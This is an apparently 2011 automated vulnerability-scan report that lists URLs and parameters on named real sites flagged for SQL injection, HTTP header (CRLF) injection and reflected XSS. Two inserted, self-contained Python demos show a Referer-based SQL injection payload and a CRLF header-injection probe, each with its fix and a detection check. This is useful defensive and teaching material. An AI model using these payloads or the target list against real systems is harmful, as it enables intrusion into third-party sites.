SQL Injection, DORK, XSS, XPath Injection, CWE-79, CWE-89

Vulnerabilities in Various Hosts | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Thu Jan 20 12:04:34 CST 2011.


DORK CWE-79 XSS Report

1. SQL injection

1.1. http://www.kiteship.com/ [Referer HTTP header]

1.2. http://www.kiteship.com/ [name of an arbitrarily supplied request parameter]

1.3. http://www.tuenti.com/share [Referer HTTP header]

1.4. http://www.tuenti.com/share [User-Agent HTTP header]

1.5. http://www.tuenti.com/share [User-Agent HTTP header]
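
The Referer and User-Agent findings above mean the scanner saw the page react to SQL metacharacters placed in a request header, a vector that is easy to miss because it never appears in a form or a URL. The added example below is not code from the report or from the sites listed; it shows the usual way a header reaches a query, a visitor log that concatenates the header into an INSERT, next to the parameterised form. The table, hostnames and payload are constructed.

```python
import sqlite3

# Added example. The visitor-log schema, the hostnames and the payload are
# constructed for illustration; nothing here is taken from the report.

def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, referer TEXT)")
    return db

def log_visit_vulnerable(db, referer):
    # The header value is spliced into the statement text, so quote
    # characters in the Referer header change the SQL that runs.
    db.execute("INSERT INTO visits (referer) VALUES ('" + referer + "')")

def log_visit_safe(db, referer):
    # Bound parameter: the driver hands the value over separately from the
    # statement, so it can only be stored, never parsed as SQL.
    db.execute("INSERT INTO visits (referer) VALUES (?)", (referer,))

def stored_referers(db):
    return [row[0] for row in db.execute("SELECT referer FROM visits ORDER BY id")]

# Closes the string literal and the VALUES tuple, then opens a second tuple:
# one request produces two rows.
PAYLOAD = "http://attacker.test/'), ('injected-by-referer"

def run_vulnerable():
    db = fresh_db()
    log_visit_vulnerable(db, PAYLOAD)
    return stored_referers(db)

def run_safe():
    db = fresh_db()
    log_visit_safe(db, PAYLOAD)
    return stored_referers(db)

def error_probe(referer):
    """What a scanner's first probe looks like: a lone quote in the header.
    Returns the database error text if the statement broke, None otherwise."""
    db = fresh_db()
    try:
        log_visit_vulnerable(db, referer)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None

if __name__ == "__main__":
    print("vulnerable:", run_vulnerable())
    print("safe:      ", run_safe())
    print("error probe:", error_probe("http://attacker.test/'"))
```

The one-row-becomes-two result is the behaviour a scanner infers indirectly from error text or timing. Before accepting a header-based finding, reproduce it with a single-quote probe and compare against the same request with the quote doubled; a site that merely chokes on unusual Referer values fails both, a real injection fails only the first.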

2. HTTP header injection

2.1. http://2822.v.fwmrm.net/ad/l/1 [cr parameter]

2.2. http://ad.afy11.net/ad [c parameter]

2.3. http://ad.doubleclick.net/ad/N5371.150779.COLLECTIVEMEDIA/B5050596.3 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/adj/cm.martini/ [REST URL parameter 1]

2.5. http://ad.doubleclick.net/click [REST URL parameter 1]

2.6. http://blip.tv/about/ [REST URL parameter 1]

2.7. http://blip.tv/about/api/ [REST URL parameter 1]

2.8. http://blip.tv/about/api/ [REST URL parameter 2]

2.9. http://blip.tv/blogs/list/ [REST URL parameter 1]

2.10. http://blip.tv/blogs/list/ [REST URL parameter 2]

2.11. http://blip.tv/careers/ [REST URL parameter 1]

2.12. http://blip.tv/comments/ [REST URL parameter 1]

2.13. http://blip.tv/dashboard [REST URL parameter 1]

2.14. http://blip.tv/dashboard/ [REST URL parameter 1]

2.15. http://blip.tv/dashboard/ads [REST URL parameter 1]

2.16. http://blip.tv/dashboard/ads [REST URL parameter 2]

2.17. http://blip.tv/dashboard/distribution [REST URL parameter 1]

2.18. http://blip.tv/dashboard/distribution [REST URL parameter 2]

2.19. http://blip.tv/dashboard/episodes [REST URL parameter 1]

2.20. http://blip.tv/dashboard/episodes [REST URL parameter 2]

2.21. http://blip.tv/dashboard/ftp/ [REST URL parameter 1]

2.22. http://blip.tv/dashboard/ftp/ [REST URL parameter 2]

2.23. http://blip.tv/dashboard/players [REST URL parameter 1]

2.24. http://blip.tv/dashboard/players [REST URL parameter 2]

2.25. http://blip.tv/dashboard/stats [REST URL parameter 1]

2.26. http://blip.tv/dashboard/stats [REST URL parameter 2]

2.27. http://blip.tv/dashboard/upload [REST URL parameter 1]

2.28. http://blip.tv/dashboard/upload [REST URL parameter 2]

2.29. http://blip.tv/dmca/ [REST URL parameter 1]

2.30. http://blip.tv/dtd/blip/1.0 [REST URL parameter 1]

2.31. http://blip.tv/dtd/blip/1.0 [REST URL parameter 2]

2.32. http://blip.tv/dtd/blip/1.0 [REST URL parameter 3]

2.33. http://blip.tv/dtd/mediaad/1.0 [REST URL parameter 1]

2.34. http://blip.tv/dtd/mediaad/1.0 [REST URL parameter 2]

2.35. http://blip.tv/dtd/mediaad/1.0 [REST URL parameter 3]

2.36. http://blip.tv/epk [REST URL parameter 1]

2.37. http://blip.tv/faq [REST URL parameter 1]

2.38. http://blip.tv/file/3006747 [REST URL parameter 1]

2.39. http://blip.tv/file/3006747 [REST URL parameter 2]

2.40. http://blip.tv/file/4341289 [REST URL parameter 1]

2.41. http://blip.tv/file/4341289 [REST URL parameter 2]

2.42. http://blip.tv/file/4416697 [REST URL parameter 1]

2.43. http://blip.tv/file/4416697 [REST URL parameter 2]

2.44. http://blip.tv/file/4469619 [REST URL parameter 1]

2.45. http://blip.tv/file/4469619 [REST URL parameter 2]

2.46. http://blip.tv/file/4581305 [REST URL parameter 1]

2.47. http://blip.tv/file/4581305 [REST URL parameter 2]

2.48. http://blip.tv/file/4584742 [REST URL parameter 1]

2.49. http://blip.tv/file/4584742 [REST URL parameter 2]

2.50. http://blip.tv/file/4590551 [REST URL parameter 1]

2.51. http://blip.tv/file/4590551 [REST URL parameter 2]

2.52. http://blip.tv/file/4627157 [REST URL parameter 1]

2.53. http://blip.tv/file/4627157 [REST URL parameter 2]

2.54. http://blip.tv/file/4639878 [REST URL parameter 1]

2.55. http://blip.tv/file/4639878 [REST URL parameter 2]

2.56. http://blip.tv/file/4644899 [REST URL parameter 1]

2.57. http://blip.tv/file/4644899 [REST URL parameter 2]

2.58. http://blip.tv/file/4645321 [REST URL parameter 1]

2.59. http://blip.tv/file/4645321 [REST URL parameter 2]

2.60. http://blip.tv/file/4648265 [REST URL parameter 1]

2.61. http://blip.tv/file/4648265 [REST URL parameter 2]

2.62. http://blip.tv/file/4648488 [REST URL parameter 1]

2.63. http://blip.tv/file/4648488 [REST URL parameter 2]

2.64. http://blip.tv/file/4650005 [REST URL parameter 1]

2.65. http://blip.tv/file/4650005 [REST URL parameter 2]

2.66. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v [REST URL parameter 1]

2.67. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v [REST URL parameter 2]

2.68. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v [REST URL parameter 3]

2.69. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v [REST URL parameter 1]

2.70. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v [REST URL parameter 2]

2.71. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v [REST URL parameter 3]

2.72. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v [REST URL parameter 1]

2.73. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v [REST URL parameter 2]

2.74. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v [REST URL parameter 3]

2.75. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 [REST URL parameter 1]

2.76. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 [REST URL parameter 2]

2.77. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 [REST URL parameter 3]

2.78. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v [REST URL parameter 1]

2.79. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v [REST URL parameter 2]

2.80. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v [REST URL parameter 3]

2.81. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 [REST URL parameter 1]

2.82. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 [REST URL parameter 2]

2.83. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 [REST URL parameter 3]

2.84. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 [REST URL parameter 1]

2.85. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 [REST URL parameter 2]

2.86. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 [REST URL parameter 3]

2.87. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v [REST URL parameter 1]

2.88. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v [REST URL parameter 2]

2.89. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v [REST URL parameter 3]

2.90. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v [REST URL parameter 1]

2.91. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v [REST URL parameter 2]

2.92. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v [REST URL parameter 3]

2.93. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 [REST URL parameter 1]

2.94. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 [REST URL parameter 2]

2.95. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 [REST URL parameter 3]

2.96. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 [REST URL parameter 1]

2.97. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 [REST URL parameter 2]

2.98. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 [REST URL parameter 3]

2.99. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v [REST URL parameter 1]

2.100. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v [REST URL parameter 2]

2.101. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v [REST URL parameter 3]

2.102. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 [REST URL parameter 1]

2.103. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 [REST URL parameter 2]

2.104. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 [REST URL parameter 3]

2.105. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v [REST URL parameter 1]

2.106. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v [REST URL parameter 2]

2.107. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v [REST URL parameter 3]

2.108. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow264.m4v [REST URL parameter 1]

2.109. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow264.m4v [REST URL parameter 2]

2.110. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow264.m4v [REST URL parameter 3]

2.111. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow990.m4v [REST URL parameter 1]

2.112. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow990.m4v [REST URL parameter 2]

2.113. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow990.m4v [REST URL parameter 3]

2.114. http://blip.tv/file/get/CookingUpAStory-FoodSwap163.m4v [REST URL parameter 1]

2.115. http://blip.tv/file/get/CookingUpAStory-FoodSwap163.m4v [REST URL parameter 2]

2.116. http://blip.tv/file/get/CookingUpAStory-FoodSwap163.m4v [REST URL parameter 3]

2.117. http://blip.tv/file/get/CookingUpAStory-FoodSwap232.mp3 [REST URL parameter 1]

2.118. http://blip.tv/file/get/CookingUpAStory-FoodSwap232.mp3 [REST URL parameter 2]

2.119. http://blip.tv/file/get/CookingUpAStory-FoodSwap232.mp3 [REST URL parameter 3]

2.120. http://blip.tv/file/get/CookingUpAStory-FoodSwap596.m4v [REST URL parameter 1]

2.121. http://blip.tv/file/get/CookingUpAStory-FoodSwap596.m4v [REST URL parameter 2]

2.122. http://blip.tv/file/get/CookingUpAStory-FoodSwap596.m4v [REST URL parameter 3]

2.123. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v [REST URL parameter 1]

2.124. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v [REST URL parameter 2]

2.125. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v [REST URL parameter 3]

2.126. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v [REST URL parameter 1]

2.127. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v [REST URL parameter 2]

2.128. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v [REST URL parameter 3]

2.129. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v [REST URL parameter 1]

2.130. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v [REST URL parameter 2]

2.131. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v [REST URL parameter 3]

2.132. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v [REST URL parameter 1]

2.133. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v [REST URL parameter 2]

2.134. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v [REST URL parameter 3]

2.135. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v [REST URL parameter 1]

2.136. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v [REST URL parameter 2]

2.137. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v [REST URL parameter 3]

2.138. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv [REST URL parameter 1]

2.139. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv [REST URL parameter 2]

2.140. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv [REST URL parameter 3]

2.141. http://blip.tv/file/get/Squatters-Episode13234.m4v [REST URL parameter 1]

2.142. http://blip.tv/file/get/Squatters-Episode13234.m4v [REST URL parameter 2]

2.143. http://blip.tv/file/get/Squatters-Episode13234.m4v [REST URL parameter 3]

2.144. http://blip.tv/file/get/Squatters-Episode13604.m4v [REST URL parameter 1]

2.145. http://blip.tv/file/get/Squatters-Episode13604.m4v [REST URL parameter 2]

2.146. http://blip.tv/file/get/Squatters-Episode13604.m4v [REST URL parameter 3]

2.147. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 [REST URL parameter 1]

2.148. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 [REST URL parameter 2]

2.149. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 [REST URL parameter 3]

2.150. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v [REST URL parameter 1]

2.151. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v [REST URL parameter 2]

2.152. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v [REST URL parameter 3]

2.153. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v [REST URL parameter 1]

2.154. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v [REST URL parameter 2]

2.155. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v [REST URL parameter 3]

2.156. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v [REST URL parameter 1]

2.157. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v [REST URL parameter 2]

2.158. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v [REST URL parameter 3]

2.159. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 [REST URL parameter 1]

2.160. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 [REST URL parameter 2]

2.161. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 [REST URL parameter 3]

2.162. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v [REST URL parameter 1]

2.163. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v [REST URL parameter 2]

2.164. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v [REST URL parameter 3]

2.165. http://blip.tv/file/post/ [REST URL parameter 1]

2.166. http://blip.tv/file/post/ [REST URL parameter 2]

2.167. http://blip.tv/file/view/4639878 [REST URL parameter 1]

2.168. http://blip.tv/file/view/4639878 [REST URL parameter 2]

2.169. http://blip.tv/file/view/4639878 [REST URL parameter 3]

2.170. http://blip.tv/html5/ [REST URL parameter 1]

2.171. http://blip.tv/opensearch.xml [REST URL parameter 1]

2.172. http://blip.tv/play/AYG43E4C [REST URL parameter 1]

2.173. http://blip.tv/play/AYG43E4C [REST URL parameter 2]

2.174. http://blip.tv/play/AYG43E4C/ [REST URL parameter 1]

2.175. http://blip.tv/play/AYG43E4C/ [REST URL parameter 2]

2.176. http://blip.tv/play/AYKO2zcC [REST URL parameter 1]

2.177. http://blip.tv/play/AYKO2zcC [REST URL parameter 2]

2.178. http://blip.tv/play/AYKO2zcC/ [REST URL parameter 1]

2.179. http://blip.tv/play/AYKO2zcC/ [REST URL parameter 2]

2.180. http://blip.tv/play/AYKY+jQC [REST URL parameter 1]

2.181. http://blip.tv/play/AYKY+jQC [REST URL parameter 2]

2.182. http://blip.tv/play/AYKY+jQC/ [REST URL parameter 1]

2.183. http://blip.tv/play/AYKY+jQC/ [REST URL parameter 2]

2.184. http://blip.tv/play/AYKY31UC [REST URL parameter 1]

2.185. http://blip.tv/play/AYKY31UC [REST URL parameter 2]

2.186. http://blip.tv/play/AYKY31UC/ [REST URL parameter 1]

2.187. http://blip.tv/play/AYKY31UC/ [REST URL parameter 2]

2.188. http://blip.tv/play/AYKZp2EC [REST URL parameter 1]

2.189. http://blip.tv/play/AYKZp2EC [REST URL parameter 2]

2.190. http://blip.tv/play/AYKZp2EC/ [REST URL parameter 1]

2.191. http://blip.tv/play/AYKZp2EC/ [REST URL parameter 2]

2.192. http://blip.tv/play/AYKc0AIC [REST URL parameter 1]

2.193. http://blip.tv/play/AYKc0AIC [REST URL parameter 2]

2.194. http://blip.tv/play/AYKc0AIC/ [REST URL parameter 1]

2.195. http://blip.tv/play/AYKc0AIC/ [REST URL parameter 2]

2.196. http://blip.tv/play/AYKc93MC [REST URL parameter 1]

2.197. http://blip.tv/play/AYKc93MC [REST URL parameter 2]

2.198. http://blip.tv/play/AYKc93MC/ [REST URL parameter 1]

2.199. http://blip.tv/play/AYKc93MC/ [REST URL parameter 2]

2.200. http://blip.tv/play/AYKcqGYC [REST URL parameter 1]

2.201. http://blip.tv/play/AYKcqGYC [REST URL parameter 2]

2.202. http://blip.tv/play/AYKcqGYC/ [REST URL parameter 1]

2.203. http://blip.tv/play/AYKcqGYC/ [REST URL parameter 2]

2.204. http://blip.tv/play/AYKcqGYD [REST URL parameter 1]

2.205. http://blip.tv/play/AYKcqGYD [REST URL parameter 2]

2.206. http://blip.tv/play/hK5wgpzTKAI [REST URL parameter 1]

2.207. http://blip.tv/play/hK5wgpzTKAI [REST URL parameter 2]

2.208. http://blip.tv/play/hK5wgpzTKAI.m4v/ [REST URL parameter 1]

2.209. http://blip.tv/play/hK5wgpzTKAI.m4v/ [REST URL parameter 2]

2.210. http://blip.tv/play/hbdrgpvFPAI [REST URL parameter 1]

2.211. http://blip.tv/play/hbdrgpvFPAI [REST URL parameter 2]

2.212. http://blip.tv/play/hbdrgpvFPAI.m4v/ [REST URL parameter 1]

2.213. http://blip.tv/play/hbdrgpvFPAI.m4v/ [REST URL parameter 2]

2.214. http://blip.tv/play/hbgSgoqOawI [REST URL parameter 1]

2.215. http://blip.tv/play/hbgSgoqOawI [REST URL parameter 2]

2.216. http://blip.tv/play/hbgSgoqOawI.m4v/ [REST URL parameter 1]

2.217. http://blip.tv/play/hbgSgoqOawI.m4v/ [REST URL parameter 2]

2.218. http://blip.tv/play/hodpgpH4MwI [REST URL parameter 1]

2.219. http://blip.tv/play/hodpgpH4MwI [REST URL parameter 2]

2.220. http://blip.tv/play/hodpgpH4MwI.m4v/ [REST URL parameter 1]

2.221. http://blip.tv/play/hodpgpH4MwI.m4v/ [REST URL parameter 2]

2.222. http://blip.tv/play/hqkXgpzqKAI [REST URL parameter 1]

2.223. http://blip.tv/play/hqkXgpzqKAI [REST URL parameter 2]

2.224. http://blip.tv/play/hqkXgpzqKAI.m4v/ [REST URL parameter 1]

2.225. http://blip.tv/play/hqkXgpzqKAI.m4v/ [REST URL parameter 2]

2.226. http://blip.tv/play/hsYBgpzsBwI [REST URL parameter 1]

2.227. http://blip.tv/play/hsYBgpzsBwI [REST URL parameter 2]

2.228. http://blip.tv/play/hsYBgpzsBwI.m4v/ [REST URL parameter 1]

2.229. http://blip.tv/play/hsYBgpzsBwI.m4v/ [REST URL parameter 2]

2.230. http://blip.tv/players/embed/ [REST URL parameter 1]

2.231. http://blip.tv/players/embed/ [REST URL parameter 2]

2.232. http://blip.tv/popular [REST URL parameter 1]

2.233. http://blip.tv/posts/ [REST URL parameter 1]

2.234. http://blip.tv/posts/report_inappropriate [REST URL parameter 1]

2.235. http://blip.tv/posts/report_inappropriate [REST URL parameter 2]

2.236. http://blip.tv/prefs/security/ [REST URL parameter 1]

2.237. http://blip.tv/prefs/security/ [REST URL parameter 2]

2.238. http://blip.tv/random [REST URL parameter 1]

2.239. http://blip.tv/recent [REST URL parameter 1]

2.240. http://blip.tv/report_form/ [REST URL parameter 1]

2.241. http://blip.tv/rss [REST URL parameter 1]

2.242. http://blip.tv/rss/flash/4658178 [REST URL parameter 1]

2.243. http://blip.tv/search [REST URL parameter 1]

2.244. http://blip.tv/tools/ [REST URL parameter 1]

2.245. http://blip.tv/tos/ [REST URL parameter 1]

2.246. http://blip.tv/users/blogging_info [REST URL parameter 1]

2.247. http://blip.tv/users/blogging_info [REST URL parameter 2]

2.248. http://blip.tv/users/create/ [REST URL parameter 1]

2.249. http://blip.tv/users/create/ [REST URL parameter 2]

2.250. http://blip.tv/users/login/ [REST URL parameter 1]

2.251. http://blip.tv/users/login/ [REST URL parameter 2]

2.252. http://blip.tv/users/stats/ [REST URL parameter 1]

2.253. http://blip.tv/users/stats/ [REST URL parameter 2]

2.254. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 4]
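
Every entry in section 2 is a "REST URL parameter", that is, a path segment rather than a query-string field, and the finding means the scanner got CR LF from that segment into a response header. The added example below is constructed and is not code from the report or from any listed host: it shows what the probe looks like once percent-encoded, a stand-in server that echoes the decoded segment into a Location header, the re-encoding fix, and a check that counts the finding only when the probe comes back as its own header line. The host example.test, the probe header name and the server functions are assumptions.

```python
from urllib.parse import quote, unquote

# Added example. example.test, the probe header name and the stand-in
# server functions are constructed; they are not from the report.

PROBE_HEADER = "X-Crlf-Probe"
PROBE_VALUE = "cloudscan-20110120"

def probe_segment(segment):
    """Percent-encode a path segment that carries CR LF plus a marker header."""
    return quote(f"{segment}\r\n{PROBE_HEADER}: {PROBE_VALUE}", safe="")

def first_segment(request_path):
    return unquote(request_path.lstrip("/").split("/", 1)[0])

def vulnerable_redirect(request_path):
    """Stand-in for a server that decodes the first path segment and writes it
    straight into Location. The CR LF ends the Location line and the rest of
    the value becomes a header of the attacker's choosing."""
    target = first_segment(request_path)
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: http://example.test/{target}\r\n"
            "Content-Length: 0\r\n\r\n").encode("latin-1")

def hardened_redirect(request_path):
    """Same server, but the segment is re-encoded before it reaches the header,
    so CR and LF stay inside the Location value as %0D%0A."""
    target = quote(first_segment(request_path), safe="")
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: http://example.test/{target}\r\n"
            "Content-Length: 0\r\n\r\n").encode("latin-1")

def response_headers(raw):
    """Parse the header block of a raw response into a lowercase-name dict."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers

def header_injected(raw):
    """True only if the probe came back as a header line of its own, not
    merely somewhere inside another header's value."""
    return response_headers(raw).get(PROBE_HEADER.lower()) == PROBE_VALUE

if __name__ == "__main__":
    path = "/" + probe_segment("dashboard") + "/stats"
    print(path)
    print("vulnerable:", header_injected(vulnerable_redirect(path)))
    print("hardened:  ", header_injected(hardened_redirect(path)))
```

Whether the segment is percent-decoded before it is written into a header decides the outcome, and most frameworks route on the decoded path. A single decoding bug in a redirect or canonical-URL handler therefore tends to be reported once per segment depth, which is consistent with the parameter 1, 2, 3 triples in the list above; reproduce one instance per handler rather than every line.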

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/ad/cm.martini/ [REST URL parameter 1]

3.2. http://a.collective-media.net/adj/cm.martini/ [REST URL parameter 2]

3.3. http://a.collective-media.net/adj/cm.martini/ [name of an arbitrarily supplied request parameter]

3.4. http://a.collective-media.net/adj/cm.martini/ [sz parameter]

3.5. http://americascup.mediaaccess.evolix.net/index.php [co parameter]

3.6. http://americascup.mediaaccess.evolix.net/index.php [co parameter]

3.7. http://armchairmango.blip.tv/posts [name of an arbitrarily supplied request parameter]

3.8. http://armchairmango.blip.tv/posts [name of an arbitrarily supplied request parameter]

3.9. http://backend.userland.com/creativeCommonsRssModule [REST URL parameter 1]

3.10. http://blip.tv/posts/ [callback parameter]

3.11. http://brxserv.btrll.com/crossdomain.xml [REST URL parameter 1]

3.12. http://digg.com/submit [REST URL parameter 1]

3.13. http://ib.adnxs.com/ptj [redir parameter]

3.14. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 1]

3.15. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 2]

3.16. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 3]

3.17. http://k.collective-media.net/cmadj/cm.martini/ [REST URL parameter 2]

3.18. http://k.collective-media.net/cmadj/cm.martini/ [sz parameter]

3.19. http://www.americascupmedia.com/index.php [co parameter]

3.20. http://www.americascupmedia.com/index.php [co parameter]

3.21. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 2]

3.22. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 3]

3.23. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 4]

3.24. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 4]

3.25. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 5]

3.26. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [name of an arbitrarily supplied request parameter]

3.27. http://www.beneteaucountdown.com/ [name of an arbitrarily supplied request parameter]

3.28. http://www.bymnews.com/news/newsList.php [cat parameter]

3.29. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1]

3.30. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1]

3.31. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2]

3.32. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2]

